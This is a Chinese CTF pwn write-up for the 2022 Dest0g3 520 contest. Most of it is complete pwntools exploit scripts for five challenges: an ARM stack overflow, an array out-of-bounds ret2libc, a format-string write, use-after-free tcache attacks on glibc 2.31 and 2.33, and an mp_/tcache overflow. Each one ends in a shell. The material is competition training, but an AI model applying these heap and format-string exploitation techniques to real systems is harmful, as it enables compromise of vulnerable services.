2022 Dest0g3 520迎新赛 PWN wp

比赛感悟,就一个字,*,打pwn的libc版本不确定,很烦,做出了5/7个,其它两道题,也是倒在了libc环境上就没心情做了

ez_aarch
一道ARM的栈题,程序给了个后门,修改返回地址为后门即可
exp:

# Exploit script for the "ez_aarch" challenge (pwntools).  The remote CTF node
# is used by default; the local ``process`` line is left commented out.
from pwn import *
context.log_level = "debug"
p = remote("node4.buuoj.cn",29527)
#p=process("./stack")
# 0x28 bytes of filler followed by a single byte.  The writeup says the saved
# return address is redirected to the program's backdoor; presumably p8(0x3f)
# rewrites only its low byte -- the stack layout itself is not shown here.
payload = b"A"*0X28+p8(0x3f)
p.sendafter("Please leave your name:\n",payload)
p.interactive()

ez_pwn
数组越界,直接越界到返回地址即可

# Exploit script for "ez_pwn" (32-bit target, run locally by default).
# NOTE: the ``print hex(...)`` statements further down are Python 2 syntax, so
# this script needs a Python 2 pwntools; ``str`` payloads are passed as-is.
from pwn import *
#from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')
elf = ELF('./ez_pwn')
# libc = elf.libc
p = process('./ez_pwn')
#p = remote('node4.buuoj.cn', 26638)
# puts@plt / puts@got of the target binary; used below to leak a libc address.
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

def choice(idx):
    """Answer the ``choice:`` menu prompt with option ``idx``.

    ``idx`` is sent as its decimal string.  The short sleep after the send is
    presumably pacing so the target processes the selection before the next
    prompt is awaited.
    """
    selection = str(idx)
    p.recvuntil('choice:')
    p.sendline(selection)
    sleep(0.1)

def add(pay):
    """Pick menu option 1 and answer the ``num`` prompt with ``pay`` as a decimal string."""
    value = str(pay)
    choice(1)
    p.recvuntil('num')
    p.sendline(value)

# Stage 1: write past the array (the out-of-bounds bug the writeup describes)
# so that a puts(puts@got) call is reached, leaking a libc address.
# NOTE(review): "-2147483648" (INT_MIN) is what the program accepts as the
# array size here; why that value passes the program's check is not shown.
p.sendlineafter('array:', '-2147483648')

# gdb.attach(p)

for i in range(9):
    add(0x0badf00d)
choice(3)
add(0x7fffffff)
add(0x7fffffff)
add(0x7fffffff)
add(17)
# puts@plt, a return address inside the binary (0x8049408), then puts@got as
# the argument; the 4-byte read below picks up the printed pointer.
add(puts_plt)
add(0x8049408)
add(puts_got)
print(hex(puts_plt))
print(hex(puts_got))
choice(4)

p.recvuntil('!\n')
libc=ELF("/lib/i386-linux-gnu/libc.so.6")
# p.recv(8)
puts_addr = u32(p.recv(4))
print(hex(puts_addr))
# Hard-coded offset of puts in the target's libc build (an alternative build's
# offset is kept in the trailing comment).  This, not the ELF loaded above, is
# what ties the script to one libc version.
base=puts_addr-0x67560#0x6dc30
print hex(base)
# The two symbol-based values below are immediately overwritten by hard-coded
# offsets on the following two lines, so the libc ELF lookups are dead code.
bin_sh=base+next(libc.search("/bin/sh\x00"))
system=base+libc.sym['system']
system=base+0x3cf10
bin_sh=base+0x17b9db
print hex(bin_sh)
print hex(system)
# Stage 2: same write pattern again with the computed addresses.
p.sendlineafter('array:', '-1')
for i in range(9):
        add(0x0badf00d)
add(0x7fffffff)
add(0x7fffffff)
add(0x7fffffff)
add(17)
# add() sends decimal strings; the 32-bit addresses are converted to their
# negative two's-complement form, presumably because the program parses a
# signed 32-bit integer -- confirm against the binary.
sy=system-4294967296
bi=bin_sh-4294967296
print sy
print bi
add(sy)
add(0)
add(bi)
choice(4)
p.interactive()

dest_love
bss格式化字符串,这道题恶心住了,环境不一样导致我找不到一些可利用的二次指针,在Ubuntu20找到了

# Exploit script for "dest_love" (format string with the buffer in .bss, per
# the writeup).  Remote target by default.
from pwn import *

p = remote("node4.buuoj.cn", "25335")
#p = process("./pwn")
elf = ELF("./pwn")
#gdb.attach(p)
# Leak two pointers with %p: stack slot 16 is used to recover the binary's load
# address, slot 26 a stack address.  The 0x10A0 / 0xb8 adjustments are specific
# to this binary and environment (the writeup notes the layout differs between
# systems).
p.sendlineafter("?\n", "%16$p|%26$p|")
elf.address = int(p.recvuntil("|")[:-1], 16) - 0x10A0
stack = int(p.recvuntil("|")[:-1], 16) - 0xb8

info("stack base => 0x%x"%stack)
# NOTE: the log text says "libc base" but the value is elf.address, i.e. the
# binary's load address computed above, not libc's.
info("libc base  => 0x%x"%elf.address)
check = elf.address + 0x4010
info("check addr => 0x%x"%check)

# Each payload below has the shape "%<N>c%<idx>$hn": N characters are printed
# and the count N is stored through the pointer found at stack slot idx (two
# bytes for hn, one byte for the final hhn).  Five writes are chained; the
# earlier ones set up the pointers the later ones write through.
payload = ""
payload += "%"
payload += "%d"%(stack & 0xffff)
payload += "c"
payload += "%26$hn"

p.sendlineafter("?\n", payload)

payload = ""
payload += "%"
payload += "%d"%(check & 0xffff)
payload += "c"
payload += "%39$hn"

p.sendlineafter("?\n", payload)

payload = ""
payload += "%"
payload += "%d"%(0x0ED8)
payload += "c"
payload += "%16$hn"

p.sendlineafter("?\n", payload)

payload = ""
payload += "%"
payload += "%d"%((check & 0xffff) + 2)
payload += "c"
payload += "%39$hn"

p.sendlineafter("?\n", payload)

payload = ""
payload += "%"
payload += "%d"%(0x14)
payload += "c"
payload += "%16$hhn"

p.sendlineafter("?\n", payload)

p.interactive()

ezuaf
uaf,打的tc stru为xff,可以任意申请,这里写了两个版本的exp,第一次是在libc2.31打的,本地通了远程吉尔,本来不想打了,结果还是在libc2.33版本做了出来,环境吉尔,要不然二血,呜呜呜,libc2.32之后的版本有指针保护,写的时候绕过下即可。吉尔吉尔。。。。
exp:
libc2.31:

# Exploit script for "ezuaf", first version, written against a glibc 2.31
# target (the writeup says it worked locally but not on the remote).  Python 2
# print statements are used further down.
from pwn import *

p=process("./pwn")
#p=remote("node4.buuoj.cn","28524")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def new(size,con):
    """Menu option 1: allocate a chunk of ``size`` bytes and fill it with ``con``."""
    exchange = (
        (": ", '1'),
        ("size: \n", str(size)),
        ("Content: ", con),
    )
    for prompt, reply in exchange:
        p.sendlineafter(prompt, reply)

def edit(idx,con):
    """Menu option 2: overwrite the contents of chunk ``idx`` with ``con``."""
    exchange = (
        (": ", '2'),
        ("index: \n", str(idx)),
        ("content: ", con),
    )
    for prompt, reply in exchange:
        p.sendlineafter(prompt, reply)
def free(idx):
    """Menu option 3: free the chunk stored at index ``idx``."""
    for prompt, reply in ((": ", '3'), ("index: \n", str(idx))):
        p.sendlineafter(prompt, reply)

def show(idx):
    """Menu option 4: print the contents of chunk ``idx``."""
    for prompt, reply in ((": ", '4'), ("index: \n", str(idx))):
        p.sendlineafter(prompt, reply)


# Seven 0x80-byte chunks (indices 0-6), then a 0x68 and a 0x60 chunk.
for i in range(7):
    new(0x80,'a')

new(0x68,'b')
new(0x60,'/bin/sh\x00')
free(1)
free(2)
free(7)
# show()/edit() on freed indices is the use-after-free the writeup describes.
# The 6-byte read is a heap pointer; 0x330 is the hard-coded distance to the
# heap base for this layout.
show(2)
heap_base=u64(p.recv(6).ljust(8,"\x00"))-0x330
print hex(heap_base)
l=heap_base
# NOTE(review): index 4 is not freed at this point; what the 0x221 fake size
# field is for is not explained here (the writeup says the tcache struct is
# the target) -- confirm with a debugger.
edit(4,p64(0)+p64(0x221))
edit(2,p64(l))
new(0x80,'d') #1
# 0x20 bytes of 0xff: per the writeup this is what makes any size allocatable.
new(0x80,'\xff'*0x20)
#for i in range(7):
#    free(i)
free(0)
show(0)

# 0x1ecbe0 is a hard-coded offset from the leaked pointer to the libc base for
# this particular 2.31 build; it is what ties the script to one libc version.
libc_base=u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00'))-0x1ecbe0
system=libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']
# rce is computed but never used below.
rce=libc_base+0xe3b2e
print hex(libc_base)
print hex(system)
print hex(free_hook)
edit(7,p64(free_hook))
# The triple-quoted text below is pasted one_gadget output; as a bare string
# expression it is a no-op at runtime.
'''
0xe3b2e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b31 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b34 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''
new(0x68,'a')
new(0x68,p64(system))
free(8)
p.interactive()

libc2.33:

# Exploit script for "ezuaf", second version, against glibc 2.33 (the version
# the writeup says finally matched the remote).  Only a local process is
# created here; the libc path is the author's glibc-all-in-one checkout.
from pwn import *

p=process("./pwn")
libc=ELF("/home/roo/Desktop/tools/glibc-all-in-one-master/libs/2.33-0ubuntu5_amd64/libc.so.6")
def new(size,con):
    """Menu option 1: allocate a chunk of ``size`` bytes and fill it with ``con``."""
    exchange = (
        (": ", '1'),
        ("size: \n", str(size)),
        ("Content: ", con),
    )
    for prompt, reply in exchange:
        p.sendlineafter(prompt, reply)

def edit(idx,con):
    """Menu option 2: overwrite the contents of chunk ``idx`` with ``con``."""
    exchange = (
        (": ", '2'),
        ("index: \n", str(idx)),
        ("content: ", con),
    )
    for prompt, reply in exchange:
        p.sendlineafter(prompt, reply)
def free(idx):
    """Menu option 3: free the chunk stored at index ``idx``."""
    for prompt, reply in ((": ", '3'), ("index: \n", str(idx))):
        p.sendlineafter(prompt, reply)

def show(idx):
    """Menu option 4: print the contents of chunk ``idx``."""
    for prompt, reply in ((": ", '4'), ("index: \n", str(idx))):
        p.sendlineafter(prompt, reply)


# Same allocation pattern as the 2.31 version: seven 0x80-byte chunks, then a
# 0x68 and a 0x60 chunk.
for i in range(7):
    new(0x80,'a')

new(0x68,'b')
new(0x60,'/bin/sh\x00')
free(1)
free(2)
free(7)
# show() on a freed index (UAF).  The leaked value is shifted left by 12:
# presumably it is a protected next pointer of the kind the writeup mentions
# for glibc >= 2.32, so the shift recovers the page-aligned heap base.
show(1)
heap_base=u64(p.recv(6).ljust(8,"\x00"))<<12#<<12#-0x330
print hex(heap_base)
# NOTE(review): index 4 is not freed here; the purpose of the 0x221 fake size
# field is not explained in the writeup -- confirm with a debugger.
edit(4,p64(0)+p64(0x221))
b=heap_base+0x3c0
# XOR with (addr >> 12) is the adjustment for the pointer protection the
# writeup says must be bypassed on 2.32+; b is the hard-coded location of the
# pointer being written.
edit(2,p64(heap_base^(b>>12)))
new(0x80,'d') #1
# 0x20 bytes of 0xff: per the writeup this is what makes any size allocatable.
new(0x80,'\xff'*0x20)
#for i in range(7):
#    free(i)
free(0)
show(0)

# Hard-coded leak-to-base offset for this 2.33 build; the two commented
# alternatives are offsets for other builds the author tried.
libc_base=u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00'))-0x1e0c00#-0x219cc0#-0x1ecbe0
print hex(libc_base)
system=libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']
# malloc_hook and rce are computed but never used below.
malloc_hook=libc_base+libc.sym['__malloc_hook']
rce=libc_base+0xe3b2e
print hex(libc_base)
print hex(system)
print hex(free_hook)
f=heap_base+0x690
# Same XOR adjustment as above, with f the hard-coded address of chunk 7's
# pointer field; the second qword is written unprotected.
edit(7,p64((free_hook)^(f>>12))+p64(free_hook))
# The triple-quoted text below is pasted one_gadget output; as a bare string
# expression it is a no-op at runtime.
'''
0xe3b2e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b31 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b34 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''
new(0x68,p64(0xb))
# fh is computed but never used; the commented lines are earlier attempts.
fh=free_hook-0x8
#p.sendlineafter(": ",'1')
#p.sendlineafter("size: \n","0x68")
#p.sendlineafter("Content: ",p64(system)*8)
#new(0x68,p64(system))
#new(0x68,p64(system))
new(0x68,p64(system))
free(8)
p.interactive()

emma
我这里打的mp_,tc stru溢出,这里偏移是一个一个在源码调试出来的,麻烦死了,调这个题调吐了,还是动调yyds
exp:

# Exploit script for "emma" (the writeup attacks mp_ and overflows into the
# tcache struct; offsets were found by debugging).  Local process only; the
# libc ELF is loaded later in the script, after the first leak.
from pwn import *


p=process("./ff")
def add(idx,size,con):
    """Menu option 1: allocate chunk ``idx`` with ``size`` bytes, filled with ``con``."""
    exchange = (
        (">>\n", '1'),
        ("Index: \n", str(idx)),
        ("Size: \n", str(size)),
        ("Content\n", con),
    )
    for prompt, reply in exchange:
        p.sendlineafter(prompt, reply)
def edit(idx,con):
    """Menu option 2: overwrite the contents of chunk ``idx`` with ``con``."""
    exchange = (
        (">>\n", '2'),
        ("Index: \n", str(idx)),
        ("Content\n", con),
    )
    for prompt, reply in exchange:
        p.sendlineafter(prompt, reply)
def show(idx):
    """Menu option 3: print the contents of chunk ``idx``."""
    for prompt, reply in ((">>\n", '3'), ("Index: \n", str(idx))):
        p.sendlineafter(prompt, reply)

def dele(idx):
    """Menu option 4: free the chunk stored at index ``idx``."""
    for prompt, reply in ((">>\n", '4'), ("Index: \n", str(idx))):
        p.sendlineafter(prompt, reply)

# Three large chunks plus one 0x1000-byte chunk at index 10.
add(0,0x440,'a')
add(1,0x430,'b'*0x430)
add(2,0x430,'ddd')
add(10,0x1000,'d'*0x1000)
# show() on a freed index (use-after-free) leaks a libc pointer.
dele(0)
show(0)
# The libc ELF is opened here rather than at the top of the script.  0x1ecbe0
# is a hard-coded leak-to-base offset for one specific libc build.
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc_base=u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00'))-0x1ecbe0
print hex(libc_base)
#add(17,0x440,'asdasdasdasdasd')
free_hook=libc_base+libc.sym['__free_hook']
add(8,0x460,'adasd')
# Overwrite the first 16 bytes of the freed chunk 0 and read past them to leak
# a heap pointer; 0x20a is the hard-coded distance to the heap base.
edit(0,'a'*16)
show(0)
p.recvuntil('a'*0x10)
heap=u64(p.recv(6).ljust(8, '\x00'))-0x20a
print hex(heap)
# mp_ offset for this libc build (hard-coded, like 0x1ecff0 / 0x1ecfe0 below).
# NOTE(review): the writeup says these offsets were found by stepping through
# glibc source; they are only valid for the same build.
mp_bins=libc_base+0x1ec2d0
edit(0,p64(libc_base+0x1ecff0)*2+p64(heap+0x290)+p64(mp_bins-0x20))
dele(2)
add(3,0x460,'/bin/sh\x00')
add(5,0x430,'dd')
#add(7,0x890,'aaa')
edit(0,p64(libc_base+0x1ecfe0)*2+p64(heap+0x290)+p64(heap+0x290))
add(0,0x440,'a')
dele(10)
system=libc_base+libc.sym['system']
#add(1,0x660,'aaa')
# 0x188 bytes of padding before the free_hook address is written three times;
# the padding length comes from the author's debugging, not from the code.
edit(1,'a'*0x188+p64(free_hook)*3)
add(11,0x1000,p64(system))
dele(3)

p.interactive()

总结:不给libc,不确定其版本,一点体验都没有,盲打吗。,真无语死了。。。。。。。。。。

本文链接:

http://azly.top/index.php/archives/59/